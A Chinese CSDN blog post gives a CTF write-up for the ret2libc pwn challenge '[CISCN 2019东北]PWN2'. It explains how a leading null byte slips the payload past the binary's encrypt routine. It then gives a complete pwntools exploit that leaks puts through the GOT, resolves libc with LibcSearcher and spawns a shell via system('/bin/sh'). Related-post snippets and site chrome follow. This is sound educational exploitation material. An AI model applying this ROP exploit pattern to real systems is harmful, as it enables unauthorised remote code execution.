【PWN · ret2libc】[CISCN 2019东北]PWN2

最新推荐文章于 2024-06-01 10:35:00 发布
最新推荐文章于 2024-06-01 10:35:00 发布
阅读量629 收藏 2
点赞数 2
分类专栏: 【PWN · Stack】 文章标签: python pandas 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/130997910
版权

虽然最近的ret2libc的做题基本一致(毕竟类型都是ret2libc嘛),但是对于本蒟蒻现阶段来说,还是有必要记录一下的

前言

持续巩固ret2libc的做题范式/基本套路能力,同时也发现,reverse与pwn密不可分的联系。

一、题目重述

encrypt()存在栈溢出漏洞,同时程序不存在system或者'/bin/sh'

典型的ret2libc 

二、解题过程

1.代码理解

程序要求必须选择encrypt否则死循环/“报错”。而encrypt中存在栈溢出漏洞。

encrypt中,对于输入的字符串,通过检测长度,来对每一个字符进行encrypt,建立映射关系。

思路一:构造合适的payload,使得我们用于攻击的部分代码,经过encrypt恰好变成有用的payload

——真的是这样吗,那我们的任务量将被大大增大

这是很直接的想法——对粗线条的我来说是这样的。

然而实际上我们关注的是放到栈中的内容, 尽可能不让程序修改这些构造好的payload——字符串的结束标识符是'\x0',那我们一开始就传入一个“空串",后面再跟上我们的payload,那么对于字符串加密的部分,就只会作用于空串——实际上不修改这串payload的任何部分。

为什么一开始我不选择这样做呢?因为我害怕send在'\x0'处截断——萌新的可爱之处。

不过如果我们关注溢出漏洞函数的细微差别——gets读取屏幕缓冲区的一行字符串,那么\x0及之后的内容也是可以被读入的。(是这样吧?)

思路二:开头用'\x00'来绕过对payload的encrypt,然后正常进行溢出操作

2.exp 

from pwn import *

context(arch="amd64",os="linux",log_level="debug")

elf=ELF("./pwn")

io=remote("node2.anna.nssctf.cn",28264)

io.sendlineafter('choice!',b'1')

puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
pop_rdi=0x400c83
encrypt_addr=0x4009a0
ret_addr=0x4006b9

payload=b'\x00'+b'a'*(0x50-0x1)+b'a'*8
payload+=p64(pop_rdi)+p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(encrypt_addr)

io.sendlineafter('encrypted',payload)

puts_real=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00"))

from LibcSearcher import *
libc=LibcSearcher('puts',puts_real)
libc_base=puts_real-libc.dump("puts")
system_addr=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

#io.sendlineafter(b'choice!\n',b'1')
payload=b'\x00'+b'a'*0x57
payload+=p64(ret_addr)+p64(pop_rdi)+p64(bin_sh)
payload+=p64(system_addr)

io.sendlineafter('encrypted',payload)

io.interactive()

3.注意点 

如果注意到第二个payload中的ret,会不会有疑问呢?

其实这是因为system被调用时,其中有一个汇编指令,要求栈顶16字节对齐,而我们为了能够正常执行跳转,又需要栈能够调整其高度,就可以通过ret+ret+...+addr的方式,这样首先是调整了输入的个数,其次ret到下一个ret,反复执行实则是“空转”,相当于pop了当前的栈元素,不起到任何其他作用。最后还是跳到了addr的位置。

总结

【PWN · ret2libc】[2021 鹤城杯]babyof_Mr_Fmnwon的博客-CSDN博客

这篇博客ret2libc的细节比较多,且这两个题目完全相似。 

Mr_Fmnwon
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
pwn ret2libc
清霂的博客
02-04 402
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
ret2libc2pwn 入门题
02-11
pwn 入门题
[CISCN 2019东北]PWN2
沈理大学牲的博客
11-20 283
p64(pop_ret_rdi_addr)+p64(bin_sh_addr):system函数的参数准备,即把'/bin/sh'的地址传入。p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+:输出puts函数的真实地址,用于后面的寻找libc。#'/bin/sh'的真实地址=libc基址的真实地址+'/bin/sh'相对于libc基址的偏移量。#system函数的真实地址=libc基址的真实地址+system函数相对于libc基址的偏移量。
[CISCN 2019东北]PWN2题解
XJQ100717的博客
04-20 786
要学习的看过来
BUUCTF-[CISCN2019 华东北赛区]Web2
AndyNoel的博客
05-13 377
BUUCTF-[CISCN2019 华东北赛区]Web2 看题 一个论坛,内容不错:) 可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。 常规操作,扫一下站点,发现有admin.php,进行访问 思路 有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag 执行 去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面 使用
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1040
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1067
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
PWN · ret2libcret2libc2
Mr_Fmnwon的博客
05-08 509
经过ret2libc1的洗礼,我们对ret2libc的做题模范有了基本的范式,然而实际的题目远没有如此直白和简单。本题就遇到了一个问题:"/bin/sh"字符串在程序中并不存在,怎么办?其实很简单:没有我们就自己输入。因为具体的原理在ret2libc1中已经很详细地讲述了,所以本篇博客主要复现解题过程。从最基本理解原理的ret2libc1,到有点花头的ret2libc2,值得展望的是,比赛的题目,远远难于此。但千里之行始于足下,掌握好这些基础的,掌握好这些原理,才能慢慢深入进阶。
PWN · ret2libc】[2021 鹤城杯]babyof
Mr_Fmnwon的博客
05-30 1637
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
PWN · ret2libcret2libc1
Mr_Fmnwon的博客
05-08 938
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
pwn07.ret2syscall例题
11-11
ret2syscall例题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
专属编程笔记
最新发布
u014397365的博客
06-01 1064
在软件开发中,Utils(或Utilities)目录通常用于存放一些。这些工具类或函数为整个应用程序或多个模块提供便利的功能支持,使得代码更加模块化、易于维护和重用。UtilsUtils目录的设计目的在于避免代码重复,并确保在整个项目中以一致的方式处理共通任务。这样做可以提高开发效率,降低维护成本,并确保代码的整洁性和可读性。
如何mysql数据导入到mongdb
codemami的博客
05-30 1646
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
在linux服务器上使用tensorboard,错误记录
wwwwzm的博客
05-30 1304
1. 使用tensorboard命令时,不是从虚拟环境中找tensorboard,而是从(全局路径)中找(/home/ljx/.local/lib/python3.9/site-packages/tensorboard)是一个在 Unix-like 系统(包括 Linux 和 macOS)的命令行界面(如 Bash shell)中使用的命令。2.使用which命令, 查看使用的tensorboard的路径,发现使用的是全局路径,不是虚拟环境路径。是一个特殊的变量,它定义了操作系统搜索可执行文件的目录。
基于NANO 9K 开发板加载PICORV32软核,并建立交叉编译环境
pocean2012的博客
05-30 1300
ISP的实现逻辑是出厂“芯片”(我们这里是软核)自带了BootLoader程序,即出厂引导程序,通过BootLoader可以将程序从串口(上位机)下载到Flash中,实际的时序是通过RST来区分正常启动还是烧录状态,然后上位机的烧录脚本来控制串口时序, 用户程序实际上是通过串口最终下载到了FLASH中,然后程序从flash启动。NANO 9K低成本体验FPGA开发,还是挺香的,官方例子有加载PICORV32软核的例子,可以建立简单的ISP编程环境,通过串口就可以加载程序,很方便。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值